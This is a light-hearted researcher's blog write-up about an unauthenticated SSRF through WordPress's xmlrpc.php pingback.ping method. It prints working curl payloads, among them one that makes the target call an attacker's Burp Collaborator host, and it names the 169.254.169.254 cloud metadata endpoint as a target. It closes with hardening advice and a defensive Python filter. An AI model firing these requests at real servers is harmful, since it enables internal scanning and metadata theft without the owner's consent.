🛰️ So… I Made a Server Call Me Back. Unauthenticated SSRF via XML-RPC
One fine evening, while sipping coffee stronger than my will to live, I accidentally made a server talk to me. Literally.
☕ The Setup: XML-RPC aka WordPress’s Forgotten Child
Ever stumble upon a file named xmlrpc.php and think, “Oh look, a rusty gate to the backend world”?
That’s exactly what I thought. And like every other bored hacker with caffeine in their blood, I poked it using curl.
Request:
curl -X POST https://target.com/xmlrpc.php \
-H "Content-Type: text/xml" \
--data '<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall>'
Response:
<methodResponse>
<params>
<param><value><string>Hello!</string></value></param>
</params>
</methodResponse>
Server said hello. I said: “Nice to meet you, let’s be friends… maliciously.” 😈
🔍 Enumerating Methods Like a Nosy Neighbor
Naturally, I wanted to know what tricks this server had.
Request:
curl -X POST https://target.com/xmlrpc.php \
-H "Content-Type: text/xml" \
--data '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName><params></params></methodCall>'
Response:
A giant list of methods dropped like:
pingback.ping
metaWeblog.newPost
wp.uploadFile
blogger.deletePost
wp.getUsers
...
When you realize the server knows more methods than you do in Python.
🚨 The Vulnerability That Hit Different: pingback.ping
So what does pingback.ping do?
Well, it lets the server make a request to another URL.
Imagine calling your friend to check if someone linked your blog — now imagine your friend is a vulnerable server that calls any URL you give it.
So I handed it a very harmless link (my Burp Collaborator domain).
Payload:
curl -X POST https://target.com/xmlrpc.php \
-H "Content-Type: text/xml" \
--data '<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://attacker.burpcollaborator.net</string></value></param>
<param><value><string>https://target.com/blog/hello-world</string></value></param>
</params>
</methodCall>'
📡 And It Responded… Loudly
My Burp Collaborator popped off like:
- ✅ DNS Lookup from one IP
- ✅ HTTP request from another IP
- ✅ Extra DNS queries from a third
Bro, the server was working harder than me on a Monday morning.
😱 Impact: Why You Shouldn’t Trust Strangers
With this unauthenticated SSRF (Server-Side Request Forgery), I could:
- Port scan internal services like a nosy neighbor
- Try to reach metadata services (http://169.254.169.254)
- Abuse it to pivot further
- Chain it with more vulnerabilities (like RCE, who knows!)
All without logging in. Just plain XML and desperation.
🔒 Recommendations (aka How to Make Your Server Less Friendly)
- Disable pingback.ping unless you really need it
- Block xmlrpc.php entirely if unused
- Use allowlists on outbound HTTP requests
- Monitor internal traffic like you monitor memes during work
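As an added defender-side example (my own illustration, not code from the original post or from WordPress), here is a small Python filter of the kind a reverse proxy or WAF hook could run on each XML-RPC body before it reaches xmlrpc.php: it parses the request with the standard library, refuses pingback.ping when the feature is switched off or when the sourceURI points at a non-public address such as 169.254.169.254, and marks the remaining pingbacks for logging. The request bodies and the names classify and check_source_uri are constructed for this example.

```python
import ipaddress
import xmlrpc.client
from urllib.parse import urlsplit

# Constructed sample bodies: the post's pingback payload and a metadata-service variant.
PINGBACK_EXTERNAL = (
    '<?xml version="1.0"?><methodCall><methodName>pingback.ping</methodName><params>'
    '<param><value><string>http://attacker.burpcollaborator.net</string></value></param>'
    '<param><value><string>https://target.com/blog/hello-world</string></value></param>'
    '</params></methodCall>'
)
PINGBACK_METADATA = PINGBACK_EXTERNAL.replace(
    "http://attacker.burpcollaborator.net", "http://169.254.169.254/latest/meta-data/")
SAY_HELLO = ('<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName>'
             '<params></params></methodCall>')


def check_source_uri(url: str) -> str:
    """Judge the pingback sourceURI, i.e. the URL the server would go and fetch."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return "reject: scheme not allowed"
    host = parts.hostname or ""            # drops userinfo, port and IPv6 brackets
    if not host:
        return "reject: missing host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A hostname cannot be judged before DNS resolution; the outbound HTTP
        # client must re-check the resolved address at connect time (rebinding).
        return "log: pingback to hostname"
    if not ip.is_global:                   # loopback, RFC 1918, link-local (169.254/16), ...
        return "reject: non-public address"
    return "log: pingback to public IP"


def classify(body: str, pingback_enabled: bool = True) -> str:
    """Decide what to do with one XML-RPC request body before it reaches xmlrpc.php."""
    try:
        params, method = xmlrpc.client.loads(body)
    except Exception:                      # malformed XML or unsupported value types
        return "reject: unparseable XML-RPC"
    if method != "pingback.ping":
        return "allow"
    if not pingback_enabled:
        return "reject: pingback.ping disabled"
    if len(params) != 2 or not all(isinstance(p, str) for p in params):
        return "reject: malformed pingback"
    source_uri, _target_uri = params
    return check_source_uri(source_uri)
```

The literal-IP check alone is not enough: a hostname can resolve to an internal address, so the allowlist on outbound requests has to be enforced by the HTTP client on the resolved IP as well.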
🧑💻 Researcher Behind the Chaos
Hi, I’m Mayank aka AIwolfie.
I break things ethically, automate recon, and drink coffee like it’s a legal drug (which it is… for now).
You can catch my tools and chaos here: https://github.com/AIwolfie
☕ Final Thoughts
If your server still supports XML-RPC in 2025, and especially pingback.ping, it’s basically saying:
“I’m open to conversations… even with attackers.”
Patch up. Audit your WordPress setups. And never underestimate old endpoints with long names.
Also: drink your coffee. The bugs won’t find themselves.